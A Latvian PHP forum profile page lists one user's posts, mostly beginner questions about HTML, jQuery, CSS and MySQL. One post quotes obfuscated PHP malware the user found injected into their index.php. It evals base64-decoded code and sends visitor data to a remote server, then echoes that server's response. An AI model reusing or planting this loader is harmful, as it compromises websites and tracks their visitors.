Jump to content
php.lv forumi

-=HELLBENDER=-

Reģistrētie lietotāji
  • Posts

    299
  • Joined

  • Last visited

About -=HELLBENDER=-

  • Birthday 01/12/1990

Contact Methods

  • MSN
    lauris3722
  • ICQ
    0
  • Yahoo
    lauris3722

Profile Information

  • Location
    Starp četrām sienām un jumtu

-=HELLBENDER=-'s Achievements

Newbie

Newbie (1/14)

  1. Ir tabula, kurai nevajadzētu būt balti borderi, bet tomēr uz firefox tie ir.. Chrome (Tā kā vajadzētu būt): Firefox: Tabula; <table style="border:0px solid #05463f;" border="2" bordercolor="#05463f" cellspacing="2" cellpadding="2" width="300"> <tr> <td>Pilsētas informācija</td> </tr> </table> <table style="border:0px solid #05463f;" border="2" bordercolor="#05463f" cellspacing="1" cellpadding="1" width="300"> <tr> <td>Resursu ieguve</td> <td>x122 / stundā</td> </tr> <tr> <td>Koordinātes</td> <td>1:1:27</td> </tr> </table> Kas ugunslapsai nepatīk un kā to labot?
  2. Vainu atradu (nodzēšot .value >> pass != passc). Kā īsti javaskriptā ir, ko maina .value un kad jāizmanto pēdiņas?
  3. Pārbaudīt, vai passc nav vienāds ar pass.value.. Noņemot pēdiņas, skripts saka, ka paroles vienmēr ir vienādas, kaut vai tā nav.
  4. Sveiki, par cik javascript tikai vakar sāku mācīties, jau kādu stundu mocos pie vienas lietas un gūglē neko noderīgu neatradu.. Tātad, ir form'a; <tr> <td width="200"><div align="right">Password: </div></td> <td width="100"><input size="20" type="text" id="password" name="password"></td> <td width="400" align="left"><div id="status2"></div></td> </tr> <tr> <td width="200"><div align="right">Confirm Password: </div></td> <td width="100"><input size="20" type="text" id="confirm_password"name="confirm_password"></td> <td width="400" align="left"><div id="status3"></div></td> </tr> Un lapas augšpusē javaskripts; $("#confirm_password").change(function() { var passc = $("#confirm_password").val(); var pass = $("#password").val(); if('passc.value' != 'pass.value') { $("#status3").html('<font color="red">Paroles nav vienādas</font>'); $("#confirm_password").removeClass('object_ok'); $("#confirm_password").addClass("object_error"); } else { $("#confirm_password").removeClass('object_error'); $("#confirm_password").addClass("object_ok"); $("#status3").html(' <img src="tick.gif" align="absmiddle">'); } }); Skripts saka, ka paroles nav vienādas, kaut vai tās ir.. Mēģināju arī var e = form.elements, nekā.. Noņemot pēdiņas, saka, ka abas vienādas, kaut vai tā nav. Lapa; http://paste.php.lv/...lang=javascript ps. Username čekojas (vai aizņemts & nav pārak īss) pareizi. Ko esmu izdarījis nepareizi?
  5. Sveiki.. kamēr saldi gulēju, pa nakti index.php failā mistiski parādījās kāds skripts, kurš diemžēl nav pilnībā salasāms; <?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?> Vai kādam ir kaut mazākā nojausma, ko šis skripts varēja izdarīt un cik liela ir varbūtība, ka datubāze, lietotāju dati vai kas cits varētu būt nozagts? Paldies.
  6. Uzliku, strādā, bet tas tomēr nav risinājums.. Esi nopelnījis cepumu ar attapīpu, kā atradi fate.lv.
  7. Laba diena, par cik man CSS'ā nav gandrīz nekāda pieredze, dodos pēc palīdzības pie Jums. Problēma sekojoša; Pirmais links zem ievada, "apskatīt savu ideju", daļēji aizklājas. Nav ne jausmas kur tieši ir vaina un kā to labot nesakropļojot visu dizainu (mans vienīgais mēģinājums to labot izvērtās diezgan nepatīkami). CSS daļa: Ja šo daļu izdzēš, vairs nekas neaizklājas, bet pēdējais links aiziet jaunā rindā, kas nekam neder. Viss css:http://paste.php.lv/edd57ac13cfa9524ab30937283ba5095?lang=css Skripts: Kā to labot?
  8. mysql_errors parādīja šo "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'key = 'fxg49qzy9yw'' at line 1" (pirmajam) bet nu kā jau teicu, kļūdu tur nespēju saskatīt. Problēma nav gluži tādi pati, kā tajā topikā.
  9. $randoms = random_string(); $niks = mysql_real_escape_string($_POST['niks']); $skype = mysql_real_escape_string($_POST['skype']); $nosaukums = mysql_real_escape_string($_POST['nosaukums']); $apraksts = mysql_real_escape_string($_POST['apraksts']); if(mysql_num_rows(mysql_query("SELECT * FROM saraksts WHERE key = '$randoms'"))){ echo "Ieraksts jau eksistē!"; break; } $sql="INSERT INTO saraksts (niks, skype, nosaukums, apraksts, key, ip) VALUES ('$niks', '$skype', '$nosaukums', '$apraksts', '$randoms', '$_SERVER[REMOTE_ADDR]')"; Ilgi pētīju, bet nespēju saskatīt kur ir kļūda.. Varbūt kādam ir veiklāka acs?
  10. Sveiki.. Vai ir iespējams izmantojot form nosūtīt informāciju uz lapu, kura ir citā lapā.. Nemāki tieši paskaidrot, tādēļ ielikšu piemēru. <form name="input" action="http://index.php?asd" method="get"> IP: <input type="text" name="ip" /><br/> <input type="submit" value="Banot!" /> Lapa atrodas lapa.php?page=acp&cat=addban. Iesūtot form, ip adresei vajadzētu nonākt uz lapa.php?page=acp&cat=addban&ip=, bet aiziet uz lapa.php?ip=. Kā to labot?
  11. Sveiki.. Cenšos izveidot tādu kā bana skriptu. Vienā teiblā stāv informācija par lietotāju/iesūtīto informāciju un otrā banotās ip adreses. Vienā lapā vajag iegūt gan visu informāciju no pirmā teibla, gan otrā. Mēģināju ar šādu metodi; $num = $_GET["id"]; $num = strval($num); $result = mysql_query("SELECT * FROM saraksts WHERE id = $num "); $row = mysql_fetch_array($result) or die(mysql_error()); $ip=$row["ip"]; $result2 = mysql_query("SELECT * FROM ipban WHERE ip = $ip "); $row2 = mysql_fetch_array($result2) or die(mysql_error()); Priekš pirmā teibla varētu izmantot row un otrā row2, bet nē, php kaut kas nepatīk. 233: $row2 = mysql_fetch_array($result2) or die(mysql_error()); Ir kādas alternatīvas? edit: nedaudz pa-debugoju un noskaidroju ka vaina ir otrajā query, kur ir "..ip = $ip..". Izmainot uz $result2 = mysql_query("SELECT * FROM ipban WHERE ip = 123.123.123.123 "); errors pazūd, bet tas nekam neder. edit2: Viss skaidrs.. Kā jau man ierasts, aizmirsu $ip ielikt pēdiņās. Var slēgt.
  12. @codez .. Nekas neizmainījās.. @marrtins .. Ir rūteris (WL-520GC, noņemts connection limits un uzlikts DD-RWT + overklokots), bet šaubos vai tas ir pie vainas, par cik citur up speed ir daudz lielāks.
×
×
  • Create New...